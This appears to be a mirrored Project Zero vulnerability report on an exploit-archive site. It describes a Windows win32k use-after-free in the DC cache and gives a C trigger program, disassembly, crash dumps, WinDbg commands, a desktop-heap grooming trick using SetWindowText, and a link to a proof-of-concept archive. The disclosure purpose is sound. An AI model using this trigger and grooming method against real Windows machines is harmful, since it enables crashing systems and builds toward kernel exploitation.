首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and C
来源:Google Security Research 作者:Google 发布时间:2018-01-08  
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6
 
Windows maintains a DC cache in win32kbase!gpDispInfo->pdceFirst. If you create multiple windows from a shared class while switching between CS_OWNDC and CS_CLASSDC, you can cause cache list entries to maintain references to free WND structures.
 
There are two interesting background posts on CS_OWNDC and CS_CLASSDC here:
 
https://blogs.msdn.microsoft.com/oldnewthing/20060601-06/?p=31003
https://blogs.msdn.microsoft.com/oldnewthing/20060602-00/?p=30993
 
Here is a minimal testcase:
 
$ cat dccache.c
#include <windows.h>
 
#pragma comment(lib, "user32")
 
int main(int argc, char **argv) {
    WNDCLASSEX WindowClass = {0};
    HWND WindowA, WindowB, WindowC;
    ATOM Atom;
 
    WindowClass.cbSize         = sizeof(WNDCLASSEX);
    WindowClass.lpfnWndProc    = DefWindowProc;
    WindowClass.lpszClassName  = "Class";
 
    Atom = RegisterClassEx(&WindowClass);
    WindowA = CreateWindowEx(0, MAKEINTATOM(Atom), "One", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC);
    WindowB = CreateWindowEx(0, MAKEINTATOM(Atom), "Two", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    GetDC(WindowA);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC | CS_OWNDC);
    WindowC = CreateWindowEx(0, MAKEINTATOM(Atom), "Three", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
 
    return 0;
}
 
This might take a while to crash though, something has to cause the list to be traversed (e.g. a new window opens) after the freed memory has changed. It can also crash in some very strange places. We can speed the process up by trying to get the allocation ourselves.
 
First I need to know the size of a WND structure. If you look at the call to HMAllocObject() in win32kfull!xxxCreateWindowEx, you can see it's 240 bytes:
 
.text:00081BCC _xxxCreateWindowEx@68 proc near
...
.text:00081EE2 push    240             ; _DWORD
.text:00081EE7 push    1               ; _DWORD
.text:00081EE9 push    [ebp+var_12C]   ; _DWORD
.text:00081EEF push    ebx             ; _DWORD
.text:00081EF0 call    ds:__imp__HMAllocObject@16 ; HMAllocObject(x,x,x,x)
 
 
A well-known trick to get arbitrary sized allocations from the desktop heap is to use SetWindowText(), you just create a WCHAR string of the required length - good enough for testing.
 
e.g. SetWindowTextW(Window, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...");
 
So my plan is to create a thread to trigger the free, and then try to steal the allocation. See the testcase attached for my code.
 
This reliably crashes Windows 10 with version 10.0.15063.674, the crash looks like this:
 
eax=00410041 ebx=00000010 ecx=95423580 edx=95423580 esi=99464440 edi=954004d0
eip=93fb40d8 esp=9dba78f0 ebp=9dba7910 iopl=0         nv up ei pl nz na pe cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010207
win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba:
93fb40d8 8b403c          mov     eax,dword ptr [eax+3Ch] ds:0023:0041007d=????????
0: kd> kv
 # ChildEBP RetAddr  Args to Child             
00 9dba7910 93fb2722 00000000 0c6775a3 9dba7b80 win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba (FPO: [Non-Fpo])
01 9dba7afc 93fd1916 0000c1ac 9dba7b74 00000000 win32kfull!xxxCreateWindowEx+0xb56 (FPO: [Non-Fpo])
02 9dba7bc8 81d97397 80000000 0000c1ac 0000c1ac win32kfull!NtUserCreateWindowEx+0x2b0 (FPO: [Non-Fpo])
03 9dba7bc8 77104350 80000000 0000c1ac 0000c1ac nt!KiSystemServicePostCall (FPO: [0,3] TrapFrame @ 9dba7c14)
04 0073f0b8 7497485a 74bae418 80000000 0000c1ac ntdll!KiFastSystemCallRet (FPO: [0,0,0])
05 0073f0bc 74bae418 80000000 0000c1ac 0000c1ac win32u!NtUserCreateWindowEx+0xa (FPO: [17,0,0])
06 0073f394 74badcff 0073f3e0 00000000 80000000 USER32!VerNtUserCreateWindowEx+0x22b (FPO: [Non-Fpo])
07 0073f468 74baeaf8 00cc1010 00000000 80000000 USER32!CreateWindowInternal+0x153 (FPO: [Non-Fpo])
08 0073f4a8 00cb1173 00000000 0000c1ac 00cc1010 USER32!CreateWindowExA+0x38 (FPO: [Non-Fpo])
 
So let's dump the DC Cache and see what it looks like, an entry looks something like:
 
typedef struct _DCE {
    PDCE    pdceNext;
    HANDLE  hDC;
    PWND    pwndOrg;
    PWND    pwndClip;
    ...
} DCE, *PDCE;
 
# Make $t0 gpDispInfo->pdceFirst
0: kd> r $t0=poi(poi(win32kbase!gpDispInfo)+8)
 
# Now dump the whole list:
0: kd> .while (@$t0) { .printf "dce %p ->pwndOrg %p\n",@$t0,poi(@$t0+8); r @$t0=poi(@$t0) }
dce 99464440 ->pwndOrg 95423580
dce 922140e8 ->pwndOrg 00000000
dce 9239d638 ->pwndOrg 00000000
dce 9239beb0 ->pwndOrg 00000000
dce 99510540 ->pwndOrg 9541ede8
dce 92274178 ->pwndOrg 954004d0
dce 9223d2b0 ->pwndOrg 954004d0
dce 922050e8 ->pwndOrg 945504d0
 
So my theory is that one of these WND pointers is actually a bad reference, and
look at this:
0: kd> du 95423580
95423580  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
954235c0  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
95423600  "AAAAAAAAAAA"
 
There is the text I set via SetWindowText().
 
(The testcase I sent Microsoft triggered a couple of other BSOD I want fixed as well. I'm hoping whoever gets assigned this bug will just fix them, they're dead easy oneline fixes).
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43446.zip
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GetGo Download Manager 5.3.0.2
·Cisco IOS - Remote Code Execut
·Ayukov NFTP FTP Client Buffer
·VX Search Enterprise 10.1.12 -
·VMware Workstation ALSA Config
·Disk Pulse Enterprise 10.1.18
·D-Link DNS-320L 'mydlinkBRiony
·Sync Breeze Enterprise 10.1.16
·Western Digital WDMyCloud 'myd
·DiskBoss Enterprise 8.5.12 - D
·Iopsys Router - 'dhcp' Remote
·BarcodeWiz ActiveX Control < 6
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved